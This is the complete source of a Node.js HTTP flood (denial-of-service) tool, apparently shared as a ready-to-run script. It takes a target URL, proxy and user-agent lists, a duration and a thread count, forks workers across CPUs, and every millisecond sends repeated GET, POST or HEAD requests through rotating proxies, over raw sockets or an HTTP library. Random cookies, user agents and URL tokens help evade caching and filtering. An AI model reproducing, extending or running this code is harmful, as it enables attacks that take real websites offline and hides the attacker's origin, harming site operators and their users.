const request = require('request');const cluster = require('cluster');cons

1. const request = require('request');
2. const cluster = require('cluster');
3.  
4. const net = require('net');
5. const fs = require('fs');
6.  
7. const args = require('minimist')(process.argv.slice(2));
8. const proc_count = require('os').cpus().length;
9.  
10. //check if args are specified.
11.  
12. if(args['url'] == null)
13. {
14. return console.log('URL must be specified using the --url argument.');
15. }
16. else if(args['type'] == null)
17. {
18. return console.log('The request type must be specified using the --type argument. (post/head/get/rand)');
19. }
20. else if(args['proxyfile'] == null)
21. {
22. return console.log('Proxy file path must be specified using the --proxyfile argument.');
23. }
24. else if(args['uafile'] == null)
25. {
26. return console.log('User-agent file path must be specified using the --uafile argument.');
27. }
28. else if(args['time'] == null)
29. {
30. return console.log('Execution time must be specified using the --time argument (seconds).');
31. }
32. else if(args['repeat'] == null)
33. {
34. return console.log('Repeat amount must be specified using the --repeat argument.');
35. }
36. else if(args['threads'] == null)
37. {
38. return console.log('The number of threads must be specified using the --threads argument.');
39. }
40. else if(args['mode'] == null)
41. {
42. return console.log('You must specify the attack mode using the --mode argument. (socket/http)');
43. }
44.  
45.  
46. //check if files exist.
47.  
48. if(!fs.existsSync(args['proxyfile']))
49. {
50. return console.log('Proxy file does not exist.');
51. }
52.  
53. if(!fs.existsSync(args['uafile']))
54. {
55. return console.log('UA file does not exist.');
56. }
57.  
58. //error checking
59.  
60. process.on('unhandledRejection', err => {
61.  
62. console.log("[x] Internal error occured.");
63.  
64. });
65.  
66. process.on('uncaughtException', err => {
67.  
68. console.log("[x] Internal error occured.");
69.  
70.  
71. });
72.  
73.  
74. //save files in array.
75.  
76. const proxies = fs.readFileSync(args['proxyfile'], 'utf-8').toString().split("\n");
77. const uas = fs.readFileSync(args['uafile'], 'utf-8').toString().split("\n");
78.  
79. //remove proxies if needed.
80.  
81. if(args['max'] != null)
82. {
83. if(args['max'] <= proxies.length)
84. {
85. var left = proxies.length - args['max'];
86.  
87. for(var i = 0; i < left; i++)
88. {
89. proxies.splice(Math.floor(Math.random() * proxies.length), 1);
90. }
91. }
92. }
93.  
94. var s_requests = 0;
95.  
96. function s_random(length) {
97.  
98. var result = '';
99. var characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
100. var charactersLength = characters.length;
101.  
102. for ( var i = 0; i < length; i++ ) {
103. result += characters.charAt(Math.floor(Math.random() * charactersLength));
104. }
105.  
106. return result;
107. }
108.  
109. async function send_http(type, proxy)
110. {
111. var a_url = args['url'];
112.  
113. if(a_url.search("%RAND%"))
114. {
115. a_url = a_url.replace("%RAND%", s_random(5));
116. }
117.  
118. function setImmediatePromise() {
119. return new Promise((resolve) => {
120. setImmediate(() => resolve());
121. });
122. }
123.  
124. for(var i = 0; i < args['repeat']; i++)
125. {
126. if(type == "post")
127. {
128. var data = null;
129.  
130. if(args['params'] == null)
131. {
132. data = {
133.  
134. url: a_url,
135. headers: {
136. 'content-type' : 'application/x-www-form-urlencoded',
137. 'user-agent': uas[Math.floor(Math.random() * uas.length)],
138. 'referer': a_url
139. },
140. proxy: 'http://' + proxy
141.  
142. }
143. }
144. else
145. {
146. data = {
147.  
148. url: a_url,
149. headers: {
150. 'content-type' : 'application/x-www-form-urlencoded',
151. 'user-agent': uas[Math.floor(Math.random() * uas.length)],
152. 'referer': a_url
153. },
154. proxy: 'http://' + proxy,
155. body: args['params']
156.  
157. }
158. }
159.  
160. if(args['cookie'])
161. {
162. data.headers['cookie'] = getCookieString();
163. }
164.  
165. request.post(data, function(error, response) {
166.  
167. });
168. }
169. else if(type == "get")
170. {
171. var data = {
172. url: a_url,
173. proxy: 'http://' + proxy,
174. headers: {
175. 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36',
176. 'referer': a_url
177. }
178. };
179.  
180. if(args['cookie'])
181. {
182. data.headers['cookie'] = getCookieString();
183. }
184.  
185. request.get(data, function(error, response) {
186.  
187. if(error)
188. {
189. return console.log("[-] Proxy is probably down.");
190. }
191.  
192. console.log("[+] GET request has been sent. ");
193.  
194. s_requests ++;
195.  
196. });
197. }
198. else if(type == "head")
199. {
200. var data = { url: a_url, proxy: 'http://' + proxy, headers: { 'user-agent': uas[Math.floor(Math.random() * uas.length)], 'referer': a_url } };
201.  
202. if(args['cookie'])
203. {
204. data.headers['cookie'] = getCookieString();
205. }
206.  
207. request.head(data, function(error, response) {
208.  
209. if(error)
210. {
211. return console.log("[-] Proxy is probably down.");
212. }
213.  
214. console.log("[+] HEAD request has been sent. ");
215.  
216. s_requests ++;
217.  
218. });
219. }
220. else if(type == "rand")
221. {
222. switch(Math.floor(Math.random() * Math.floor(3)))
223. {
224. case 0:
225. {
226. var data = null;
227.  
228. if(args['params'] == null)
229. {
230. data = {
231.  
232. url: a_url,
233. headers: {
234. 'content-type' : 'application/x-www-form-urlencoded',
235. 'user-agent': uas[Math.floor(Math.random() * uas.length)],
236. 'referer': a_url
237. },
238. proxy: 'http://' + proxy
239.  
240. }
241. }
242. else
243. {
244. data = {
245.  
246. url: a_url,
247. headers: {
248. 'content-type' : 'application/x-www-form-urlencoded',
249. 'user-agent': uas[Math.floor(Math.random() * uas.length)],
250. 'referer': a_url
251. },
252. proxy: 'http://' + proxy,
253. body: args['params']
254.  
255. }
256. }
257.  
258. if(args['cookie'])
259. {
260. data.headers['cookie'] = getCookieString();
261. }
262.  
263. request.post(data, function(error, response) {
264.  
265. if(error)
266. {
267. return console.log("[-] Proxy is probably down.");
268. }
269.  
270. if(args['params'] == null)
271. {
272. console.log("[+] POST request has been sent. ");
273. }
274. else
275. {
276. console.log("[+] POST request has been sent. Params: " + args['params']);
277. }
278.  
279. s_requests ++;
280.  
281. });
282. break;
283. }
284. case 1:
285. {
286.  
287. var data = { url: a_url, proxy: 'http://' + proxy, headers: { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36', 'referer': a_url } };
288.  
289. if(args['cookie'])
290. {
291. data.headers['cookie'] = getCookieString();
292. }
293.  
294. request.get(data, function(error, response) {
295.  
296. if(error)
297. {
298. return console.log("[-] Proxy is probably down.");
299. }
300.  
301. console.log("[+] GET request has been sent. ");
302.  
303. s_requests ++;
304.  
305. });
306. break;
307. }
308. case 2:
309. {
310. var data = { url: a_url, proxy: 'http://' + proxy, headers: { 'user-agent': uas[Math.floor(Math.random() * uas.length)], 'referer': a_url } };
311.  
312. if(args['cookie'])
313. {
314. data.headers['cookie'] = getCookieString();
315. }
316.  
317. request.head(data, function(error, response) {
318.  
319. if(error)
320. {
321. return console.log("[-] Proxy is probably down.");
322. }
323.  
324. console.log("[+] HEAD request has been sent. ");
325.  
326. s_requests ++;
327.  
328. });
329. break;
330. }
331. }
332. }
333.  
334. await setImmediatePromise();
335. }
336. }
337.  
338. function getCookieString()
339. {
340. return s_random(5) + '=' + s_random(5) + '; ' + s_random(5) + '=' + s_random(5) + ";";
341. }
342.  
343. function send(type, proxy)
344. {
345. var a_url = args['url'];
346.  
347. if(a_url.search("%RAND%"))
348. {
349. a_url = a_url.replace("%RAND%", s_random(5));
350. }
351.  
352. var prox = proxy.split(":");
353.  
354. let socket = net.connect({ host: prox[0], port: prox[1] });
355.  
356. socket.once('error', err => {
357.  
358. });
359.  
360. socket.once('disconnect', () => {
361.  
362.  
363.  
364. });
365.  
366. socket.once('data', data => {
367.  
368. console.log("[+] Request has been sent. ");
369. s_requests ++;
370.  
371. });
372.  
373. let userAgent = uas[Math.floor(Math.random() * uas.length)];
374.  
375. if (!a_url.startsWith('http://') && !a_url.startsWith('https://'))
376. a_url = 'http://' + a_url;
377.  
378.  
379. for(var i = 0; i < args['repeat']; i++)
380. {
381.  
382. var cookieString = "";
383.  
384. if(args['cookie'])
385. {
386. cookieString = "\r\nCookie: " + getCookieString();
387. }
388.  
389. if(type == "post")
390. {
391. var data = null;
392.  
393. if(args['params'] == null)
394. {
395. socket.write(`POST /${a_url.split('//')[1].split('/')[1]} HTTP/1.1\r\nHost: ${a_url.split('//')[1].split('/')[0]}\r\nReferer: ${args['url']}\r\nAccept: */*${cookieString}\r\nUser-Agent: ${userAgent}\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCache-Control: max-age=0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n`);
396. }
397. else
398. {
399. socket.write(`POST /${a_url.split('//')[1].split('/')[1]} HTTP/1.1\r\nHost: ${a_url.split('//')[1].split('/')[0]}\r\nReferer: ${args['url']}\r\nAccept: */*${cookieString}\r\nUser-Agent: ${userAgent}\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCache-Control: max-age=0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ${args['params'].length}\r\n\r\n${args['params']}\r\n`);
400. }
401.  
402. }
403. else if(type == "get")
404. {
405. socket.write(`GET ${a_url} HTTP/1.1\r\nHost: ${a_url.split('//')[1].split('/')[0]}\r\nReferer: ${args['url']}\r\nAccept: */*${cookieString}\r\nUser-Agent: ${userAgent}\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCache-Control: max-age=0\r\n\r\n`);
406. }
407. else if(type == "head")
408. {
409. socket.write(`HEAD /${a_url.split('//')[1].split('/')[1]} HTTP/1.1\r\nHost: ${a_url.split('//')[1].split('/')[0]}\r\nReferer: ${args['url']}\r\nAccept: */*${cookieString}\r\nUser-Agent: ${userAgent}\r\n\r\n`);
410.  
411. // console.log("[+] HEAD request has been sent. ");
412. }
413. else if(type == "rand")
414. {
415. switch(Math.floor(Math.random() * Math.floor(3)))
416. {
417. case 0:
418. {
419. var data = null;
420.  
421. if(args['params'] == null)
422. {
423. socket.write(`POST /${a_url.split('//')[1].split('/')[1]} HTTP/1.1\r\nHost: ${a_url.split('//')[1].split('/')[0]}\r\nReferer: ${args['url']}\r\nAccept: */*${cookieString}\r\nUser-Agent: ${userAgent}\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCache-Control: max-age=0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n`);
424. }
425. else
426. {
427. socket.write(`POST /${a_url.split('//')[1].split('/')[1]} HTTP/1.1\r\nHost: ${a_url.split('//')[1].split('/')[0]}\r\nReferer: ${args['url']}\r\nAccept: */*${cookieString}\r\nUser-Agent: ${userAgent}\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCache-Control: max-age=0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ${args['params'].length}\r\n\r\n${args['params']}\r\n`);
428. }
429. break;
430. }
431. case 1:
432. {
433. socket.write(`GET ${a_url} HTTP/1.1\r\nHost: ${a_url.split('//')[1].split('/')[0]}\r\nReferer: ${args['url']}\r\nAccept: */*${cookieString}\r\nUser-Agent: ${userAgent}\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCache-Control: max-age=0\r\n\r\n`);
434. break;
435. }
436. case 2:
437. {
438. socket.write(`HEAD /${a_url.split('//')[1].split('/')[1]} HTTP/1.1\r\nHost: ${a_url.split('//')[1].split('/')[0]}\r\nReferer: ${args['url']}\r\nAccept: */*${cookieString}\r\nUser-Agent: ${userAgent}\r\n\r\n`);
439. break;
440. }
441. }
442. }
443.  
444. }
445. }
446.  
447. if(cluster.isMaster)
448. {
449. var request_counter = 0;
450. var workers_left = 0;
451.  
452. console.log("[+] " + proxies.length + " proxies have been loaded.");
453. console.log("[+] Process has been started for " + args['time'] + " seconds.");
454. console.log("[?] Running on " + proc_count + " CPUs.");
455.  
456. for(var i = 0; i < args['threads']; i++)
457. {
458. let worker = cluster.fork();
459.  
460. // console.log("Spawned 1 worker.");
461.  
462. if(i == args['threads'] - 1)
463. {
464. worker.send({ id: worker.id, proxy: proxies });
465. }
466. else
467. {
468. worker.send({ id: worker.id, proxy: proxies.splice(0, Math.ceil(proxies.length / args['threads'])) });
469. }
470. }
471.  
472. cluster.on('exit', (worker, code, signal) => {
473.  
474.  
475. });
476. }
477. else
478. {
479. process.on('message', data => {
480.  
481. var int = setInterval(() => {
482.  
483. for(var i = 0; i < data.proxy.length; i++)
484. {
485. //send request
486.  
487. if(args['mode'] == "socket")
488. {
489. send(args['type'], data.proxy[i]);
490. }
491. else if(args['mode'] == "http")
492. {
493. send_http(args['type'], data.proxy[i]);
494. }
495. else
496. {
497. console.log("Invalid mode specified. (socket/http)");
498. process.exit(1)
499. }
500. }
501.  
502. }, 1);
503.  
504. });
505.  
506. }
507.  
508. setTimeout(() => {
509. console.log("[x] Time is up! Shuttin down.. (" + s_requests + " requests sent)");
510. process.exit(1)
511. }, args['time'] * 1000);